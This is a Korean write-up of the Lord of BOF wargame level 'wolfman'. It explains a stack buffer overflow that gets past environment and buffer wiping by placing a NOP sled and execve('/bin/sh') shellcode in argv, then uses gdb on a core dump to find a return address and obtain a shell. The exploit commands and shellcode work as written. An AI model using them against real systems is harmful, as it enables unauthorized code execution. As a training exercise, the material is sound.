5. orc → wolfman

일단 어디어디가 달라졌을지 코드를 볼까요

 

[orc@localhost orc]$ cat -n wolfman.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - wolfman
     4	        - egghunter + buffer hunter
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// egghunter 
    23		for(i=0; environ[i]; i++)
    24			memset(environ[i], 0, strlen(environ[i]));
    25	
    26		if(argv[1][47] != '\xbf')
    27		{
    28			printf("stack is still your friend.\n");
    29			exit(0);
    30		}
    31		strcpy(buffer, argv[1]); 
    32		printf("%s\n", buffer);
    33	
    34	        // buffer hunter
    35	        memset(buffer, 0, 40);
    36	}

egghunter와 buffer hunter를 이용하여 환경변수와 buffer 변수를 이용하지 못하게 하는 모습을 볼 수 있습니다.

그렇다면 처음 argv의 위치를 이용하여 문제를 해결할 수 있겠네요.

 

 

 

프로그램 실행시에 argv가 어떤식으로 위치하고 작동하는지는 LOB 2. gremlin포스트를 확인해 주시기 바랍니다.

2018/07/23 - [wargame write-up/Lord of BOF] - 2. gremlin => cobolt

2. gremlin => cobolt

 

 

먼저 core파일을 생성해 주고

[orc@localhost orc]$ ./test `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf" + "\x90" * 100 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd
\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿1󿿐h//shh/bin⏓ᙰ
                                                              ̀ 
Segmentation fault (core dumped)

 

core파일 내에 \x90있는 아무 위치를 확인해 줍니다.

[orc@localhost orc]$ gdb -c core
#0  0xbfbfbfbf in ?? ()
(gdb) 
(gdb) 
(gdb) x/50wx $esp
0xbffffa90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaa0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffab0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffac0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffad0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffae0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf0:	0x90909090	0x6850c031	0x68732f2f	0x69622f68
0xbffffb00:	0x50e3896e	0x99e18953	0x80cd0bb0	0xbfffff00
0xbffffb10:	0xbfffff38	0xbfffff44	0xbfffff4c	0xbfffff56
0xbffffb20:	0xbfffff66	0xbfffff74	0xbfffff82	0xbfffff93
0xbffffb30:	0xbfffff9e	0xbfffffad	0xbfffffec	0x00000000
0xbffffb40:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb50:	0x00000005	0x00000006

 

0xbfffab0이 좋겠네요

[orc@localhost orc]$ ./test `python -c 'print "A"*44 + "\xb0\xfa\xff\xbf" + "\x90" * 100 +
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd
\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°󿐐1󿿐h//shh/bin⏓ᙰ
                                                            ̀ 
bash$ 

쉘이 성공적으로 따지네요

그럼 test대신에 wolfman을 실행시켜 봅시다

[orc@localhost orc]$ ./wolfman `python -c 'print "A"*44 + "\xb0\xfa\xff\xbf" + "\x90" * 100 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd
\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°󿐐1󿿐h//shh/bin⏓ᙰ
                                                            ̀ 
bash$ my-pass
euid = 505
love eyuna
bash$ 

 

성공적으로 쉘이 따지는걸 볼 수 있습니다.